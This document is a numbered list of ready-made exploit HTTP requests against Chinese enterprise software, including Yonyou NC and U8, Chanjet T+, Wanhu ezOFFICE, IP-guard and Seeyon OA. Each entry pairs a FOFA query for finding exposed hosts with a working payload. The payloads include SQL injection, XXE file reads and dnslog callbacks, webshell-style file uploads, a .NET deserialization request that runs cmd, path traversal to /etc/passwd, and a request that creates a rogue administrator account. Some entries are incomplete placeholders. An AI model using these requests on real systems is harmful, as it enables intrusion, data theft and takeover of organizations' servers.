Content-Type: application/x-www-form-urlencoded

32. 用友 (Yonyou) NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友 (Yonyou) NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友 (Yonyou) NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友 (Yonyou) NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友 (Yonyou) NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友 (Yonyou) NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友 (Yonyou) U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. 用友 (Yonyou) U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友 (Yonyou) U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友 (Yonyou) U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友 (Yonyou) GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友 (Yonyou) GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. 用友 (Yonyou) GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友 (Yonyou) GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友 (Yonyou) GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友 (Yonyou) GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友 (Yonyou) U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. 用友 (Yonyou) U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业ERP系统 validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微 (Weaver) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it runs a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通 (Chanjet) T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通 (Chanjet) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. 畅捷通 (Chanjet) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通 (Chanjet) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then visit:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 face-recognition all-in-one smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirms that the vulnerability exists.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

